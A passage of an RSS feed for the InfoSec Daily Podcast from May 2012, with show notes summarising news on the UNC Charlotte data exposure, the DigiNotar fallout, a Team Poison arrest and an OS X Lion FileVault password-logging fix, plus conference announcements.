<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wbtv.com/story/18245250/unc-charlotte-350000-social-security-numbers-exposed-during-internet-breach"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wbtv.com/story/18245250/unc-charlotte-350000-social-security-numbers-exposed-during-internet-breach</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">University officials at UNC Charlotte say they now know exactly what was exposed during an Internet breach earlier this year.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">School officials alerted students and staff in mid-February that online security breach hit the Charlotte-based college campus. They discovered the breach in January but told WBTV they waited to inform students until they knew more.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An investigation into the incident shows that financial account numbers and approximately 350,000 social security numbers were included among the exposed data.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The exposure has been remediated, officials say, and the University is acting to alert people who may have been affected by this exposure. University staff discovered the exposure.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I think that&#39;s really scary. It makes me feel unsafe to think my information could be out there and that somebody could take my credit and do what they want to with my social security,&quot; said student Jennifer Affinito.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Due to a system misconfiguration and incorrect access settings, a large amount of electronic data hosted by the University was accessible from the Internet.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There were two exposure issues, one affecting general university systems over a period of approximately three months, and another affecting the University&#39;s College of Engineering systems over a period exceeding a decade.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The University has no reason to believe that any information from either of these incidents was inappropriately accessed or that information was used for identity theft or other crime.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The exposed data involved people connected to the University, and included names, addresses, social security numbers, and/or financial account information provided in association with transactions with the University.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We&#39;re still investigating as to how it came to be,&quot; said Stephen Ward, a spokesman with UNCC.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The University involved state and federal regulatory and law enforcement agencies to assist in determining how to proceed, and acted upon their advice. The University continues to monitor the situation carefully and has increased its internal review procedures to watch for any unusual activity.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The university created a </span><a href="http://securityincident.uncc.edu/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">website</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> where it will post information and have setup a phone hotline at 855-205-6937 (toll-free).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com.mx/en_us/blogs/dutch-government-asks-87-reimburse-diginotar-debacle-050912"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com.mx/en_us/blogs/dutch-government-asks-87-reimburse-diginotar-debacle-050912</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Dutch government has asked DigiNotar, the Dutch certificate authority that was broken into last summer, for &euro;8.7 million ($11M USD) to recoup money it spent buying new certificates, according to several Dutch news reports. The Dutch interior ministry asked for &euro;1 million in January, yet the number &ldquo;has now risen to &euro;8.7 million,&rdquo; according to the company&rsquo;s curator Rocco Mulder in an interview with Dutch news site</span><a href="http://www.rtl.nl/components/actueel/rtlnieuws/2012/05_mei/09/binnenland/staat-claimt-8_7-miljoen-euro-bij-diginotar.xml"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> nu.nl</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mulder stressed however that there&rsquo;s very little of the company left to seize after it was forced to declare bankruptcy late last fall. Diginotar ceased operations, suspended its certificate business and since then, has been managed by a court-appointed trustee and bankruptcy judge.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mulder argues that it was the decision of the Independent Post and Telecommunications Authority of the Netherlands (OPTA) that led to the downfall of Diginotar. Mulder claims OPTA acted too fast in suspending the company&rsquo;s certificates and was heavily swayed by Fox-IT, a consultancy whose audit report on Diginotar detailed the attack and its effects. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Diginotar first made headlines in August after it had falsely issued an SSL certificate for Google to a third party. Additional forged certificates for Mozilla, Yahoo, WordPress and the Tor Project later surfaced, making it clear the authority had been breached earlier that summer.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Diginotar&rsquo;s parent company, VASCO Data Security International, eventually admitted its CA infrastructure had been compromised that July and the company halted issuing SSL certificates soon after.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.esecurityplanet.com/hackers/teen-teamp0ison-hacker-arrested-in-uk.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.esecurityplanet.com/hackers/teen-teamp0ison-hacker-arrested-in-uk.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police have arrested a 17-year-old suspected spokesman for Team Poison, a hacking group that has claimed responsibility for a series of high-profile cyber-attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The boy was arrested on Wednesday in Newcastle in connection with alleged computer misuse offences, London&#39;s Metropolitan Police said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The suspect, who is believed to use the online &#39;nic&#39; (nickname) &#39;MLT&#39;, is allegedly a member of and spokesperson for TeaMp0isoN (&#39;TeamPoison&#39;),&quot; Scotland Yard said in a statement.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;He has been taken to a local police station for interview. Computer equipment has been seized and is undergoing a detailed forensic examination.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Team Poison, believed to be behind cyber-attacks on Facebook founder Mark Zuckerberg and the Facebook page of outgoing French President Nicolas Sarkozy, &quot;has claimed responsibility for more than 1,400 offences&quot;, the statement added.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">These offences include &quot;denial of service and network intrusions where personal and private information has been illegally extracted from victims in the UK and around the world,&quot; police said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Scotland Yard itself came under attack from Team Poison last month, when the group uploaded a four-minute recording of conversations between staff manning Britain&#39;s confidential anti-terrorist hotline to YouTube.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police admitted the recordings were genuine, but insisted they were not obtained through hacking and that their internal communication systems were secure.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-665-os-x-update-dangerous-rtfs-uncc-diginotar-and-mlt-arrest/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3925/0/infosec-daily-podcast-episode-665.mp3" length="14164055" type="audio/mpeg" />
		<itunes:duration>0:29:30</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 665 for May 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 665 for May 10, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
Stories
Source: &#160;http://www.zdnet.com/blog/security/apple-releases-os-x-lion-1074-fixes-filevault-password-bug/12046
Apple today released the OS X Lion v10.7.4 update, which among other things fixes the FileVault password bug. I broke the news about this security vulnerability over the weekend (see Apple security blunder exposes Lion login passwords in clear text). Here&#8217;s the introduction:
An Apple programmer, apparently by accident, left a debug flag in the most recent version of the Mac OS X operating system. In specific configurations, applying OS X Lion update 10.7.3 turns on a system-wide debug log file that contains the login passwords of every user who has logged in since the update was applied. The passwords are stored in clear text.
Anyone who used FileVault encryption on their Mac prior to Lion, upgraded to Lion, but kept the folders encrypted using the legacy version of FileVault is vulnerable. FileVault 2 (whole disk encryption) is unaffected.
Here are the details of Apple&#8217;s fix:
Login Window
Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: Remote admins and persons with physical access to the system may obtain account information
Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. See http://support.apple.com/kb/TS4272 for more information about how to securely remove any remaining records.
The issue was noted by an Apple user almost three months ago on the Apple Support Communities forum, but nobody got back to him. When security researcher David Emery discovered it as well and posted his findings to the Cryptome mailing list, and then I wrote my report for ZDNet, the story blew up. Apple never got back to my request for comment. Still, the important thing is that the issue has been fixed. In my conclusion, I also wrote this:
Apple needs to fix this issue as soon as possible. Even when a patch is made available, it will be impossible for the company to ensure the log file has been deleted, especially given all the [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 664 &#8211;  @PentestLessons, Twitter Accounts, Business Foot the Bill, BFF, Virgin Media, and ∞AU001</title>
		<link>http://www.isdpodcast.com/episode-664-pentestlessons-twitter-accounts-business-foot-the-bill-bff-virgin-media-and-%e2%88%9eau001</link>
		<comments>http://www.isdpodcast.com/episode-664-pentestlessons-twitter-accounts-business-foot-the-bill-bff-virgin-media-and-%e2%88%9eau001#comments</comments>
		<pubDate>Thu, 10 May 2012 00:48:31 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3921</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 664 for May 9, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic Science Center [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.7351572898093651" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 664 for May 9, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Or simply use our QR Code Links.</span></p>
